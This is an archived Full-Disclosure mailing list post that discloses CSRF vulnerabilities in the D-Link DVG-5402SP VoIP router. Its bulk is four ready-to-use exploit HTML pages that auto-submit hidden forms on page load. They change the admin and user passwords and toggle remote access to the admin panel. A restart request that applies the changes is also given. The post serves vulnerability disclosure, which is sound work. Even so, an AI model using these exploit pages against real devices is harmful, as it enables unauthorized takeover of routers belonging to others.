lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Date: Mon, 31 Jul 2017 23:55:20 +0300
From: "MustLive" <mustlive@...security.com.ua>
To: <submissions@...ketstormsecurity.org>,
	<fulldisclosure@...lists.org>
Subject: [FD] CSRF vulnerabilities in D-Link DVG-5402SP

Hello list!

There are multiple Cross-Site Request Forgery vulnerabilities in D-Link 
DVG-5402SP VoIP Router.

-------------------------
Affected products:
-------------------------

Vulnerable is the next model: D-Link DVG-5402SP, Firmware RU_1.01. Other 
versions also must be vulnerable.

Since December 2014 the developers didn't answer me concerning 
vulnerabilities in DVG-5402SP and other D-Link devices, which I informed 
them about. Concerning these holes I informed them at 28.03.2016.

----------
Details:
----------

Cross-Site Request Forgery (WASC-09):

Change admin's password:

D-Link DVG-5402SP CSRF-1.html

<html>
<head>
<title>D-Link DVG-5402SP CSRF exploit (C) 2016 MustLive. 
http://websecurity.com.ua</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/goform/AspPost" method="post">
<input type="hidden" name="K13" value="1">
<input type="hidden" name="ot_confirm_password_K13" value="1">
</form>
</body>
</html>

Change user's password:

D-Link DVG-5402SP CSRF-2.html

<html>
<head>
<title>D-Link DVG-5402SP CSRF exploit (C) 2016 MustLive. 
http://websecurity.com.ua</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/goform/AspPost" method="post">
<input type="hidden" name="K374" value="1">
<input type="hidden" name="ot_confirm_password_K374" value="1">
</form>
</body>
</html>

Turn off remote access to web admin panel:

D-Link DVG-5402SP CSRF-3.html

<html>
<head>
<title>D-Link DVG-5402SP CSRF exploit (C) 2016 MustLive. 
http://websecurity.com.ua</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/goform/AspPost" method="post">
<input type="hidden" name="K626" value="0">
</form>
</body>
</html>

Turn on remote access to web admin panel:

D-Link DVG-5402SP CSRF-4.html

<html>
<head>
<title>D-Link DVG-5402SP CSRF exploit (C) 2016 MustLive. 
http://websecurity.com.ua</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/goform/AspPost" method="post">
<input type="hidden" name="K626" value="1">
</form>
</body>
</html>

Similarly can be changed any settings in admin panel, such as turn off 
telnet access.

Cross-Site Request Forgery (WASC-09):

After the change, the password must be saved and the device restarted by 
separate GET request:

http://site/ConfigBackupForm.asp

I mentioned about these vulnerabilities at my site 
(http://websecurity.com.ua/7597/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 


_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists